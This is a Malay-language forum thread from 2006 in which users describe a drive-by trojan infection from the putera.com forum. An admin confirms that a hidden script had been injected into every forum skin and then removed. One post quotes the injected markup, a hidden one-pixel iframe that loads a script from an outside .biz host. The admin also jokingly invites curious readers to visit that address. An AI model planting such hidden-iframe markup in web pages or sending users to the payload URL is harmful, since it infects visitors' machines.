Jump to content
Sign in to follow this  
anonymous

Virus Dari Putera

Recommended Posts

Hari ni aku cuba masuk putera.com guna Internet Explorer 6. Dengan tiba-tiba keluar auto download fail WMF. Antivirus detect kat temporary storage ada trojan. Aku suspect masalah ni berpunca dari putera.com. Lain-lain website takde. Mungkin tojan ni datang dari iklan-iklan duit, judi dan lucah yg ditayangkan kat putera.com

Harap pihak admin jalankan siasatan.

Ada jenglot yang dok bertenggek kat dalam putera.com guna hidden frame:

<div style="VISIBILITY: hidden"><iframe src="http://zbzppbwqmm.biz/dl/adv456.php" width=1 height=1></iframe></div>

tu ye lah spyware kalau tak silap..

tula .. lain kali gunala firefox pakai bebanyak addon

Firefox tak kena sbb tak support visibility properties.

nasib baik dah lame aku tak pakai IE malah lock lagi.

...kalau kene ngan IE tak bleh setel ker?jadi camna tu?

ishh...boleh merosakkan name Putera.com ni.

Edited by kembara

Aku dah report pada admin tentang masalah ni sudah diselesaikan oleh admin kira² jam 9 lebih tadi. Menurut admin, kemungkinan forum telah dihack dan diletakkan link ke virus tersebut. Link virus tersebut ada dalam semua skin. Lepas link tersebut dikeluarkan oleh admin, masalah ini telah diselesaikan. So korang boleh gunakan melayari putera.com guna IE seperti sedia kala.

aku pun kena.. babisss tollll.. masuk putera.. pas tu terus window aku restart... masuk window.. restart balik.. dah la keja tgh berlambak ni..

kaspersky aku pun detect ader virus bla bla bla.... aku kena jam 8.00 pm tadik.... 2 3 kali restart.... letih tol.....

bagi yang sesiapa.. dah kena tuh.. leh pakai hijackthis lol..

aku pon dah settle prob aku kena tadi huhuhu

entry yg mana nak "fix" dlm hijack this...?

aku pun kena.. babisss tollll.. masuk putera.. pas tu terus window aku restart... masuk window.. restart balik.. dah la keja tgh berlambak ni..

kaspersky aku pun detect ader virus bla bla bla.... aku kena jam 8.00 pm tadik.... 2 3 kali restart.... letih tol.....

entry yg mana nak "fix" dlm hijack this...?

aku fix semua kahkhakhakha... kalau ko nak detail.. minta lah bantuan C-FU huhuhu

ceh! rupanya aku sorang yg format sbb kena teruk...yg bestnyer mcaffee pun dia bleh disable dari running....fulamak!!!

aku pun.. kalau dia dok restart je sampai 20 kali.. aku pun format gak... nasib baik kali ke 19 = ok pulak pc aku..

*keja tgh melambak malas nak format...

Kami meminta maaf di atas segala kesulitan yang telah dialami oleh para pengguna PUTERA.com akibat daripada masalah ini.

Memang disahkan seperti yang disebut oleh puteranetwork dan civ3, bahawa ada external script yang telah dibawa masuk oleh seekor jenglot yahudi dan ditempel pada semua skin forum.

Saya dah buangkan script tersebut dan sedang menyiasat perkara ini, buat masa ini, semuanya adalah under control.

Kepada sesiapa yang ada akses forum Putera.com dalam tempoh 24 jam sebelum 9.00 malam 26 Ogos 2006, eloklah cuba scan PC masing-masing, takut-takut jenglot tersebut telah menelurkan anaknya di dalam PC saudara.

Dan kepada sesiapa yang bernasib baik dan tidak kena, tetapi ingin tahu atau ingin merasa atau ingin mengkaji, boleh layari iframe src yang puteranetwork beri seperti di atas.

Sekian harap maklum

emm aku pun tak perasan benda ni pun hampir mencoroboh pc aku...lepas baca thread ni tadi aku check kat log norton AV jumpa satu percubaan mencoroboh..:tq yang memberitahu .....

Edited by tasek16

hoyoyo, ingat kau sorang je yg format pc.. aku pun format (kena smlm).

PC aku tak restart tapi tak boleh nak shutdown or restart. Apa yg spyware ni buat? dia boleh ambil password ke?

Kalau perasan la. sejak semalam sampai hari ni, jumlah user yg tengah online tak macam sebelum-sebelumnya. Tengok sekarang dah kurang (dalam 70-80 user je). Sebelum ni leh cecah 200 user. huhu.. memang teruk penangan virus ni. Ramai yg terlibat sama.

aku musykil sikit. macam mana spyware ni boleh masuk dalam web? betul ke ada penggodam yg tanam spyware ni?

hoyoyo, ingat kau sorang je yg format pc.. aku pun format (kena smlm).

PC aku tak restart tapi tak boleh nak shutdown or restart. Apa yg spyware ni buat? dia boleh ambil password ke?

hah .. sampai format PC ..hokhokhok..

Edited by Navigator®

hah .. sampai format PC ..hokhokhok..

dua kali kena bang. Mula² kena.. aku buang pakai hijackthis. Lepas masuk kali kedua.. kena lagi. Buang pakai hijackthis gak lepas tu pc jadi mengong. Tu yg format haha.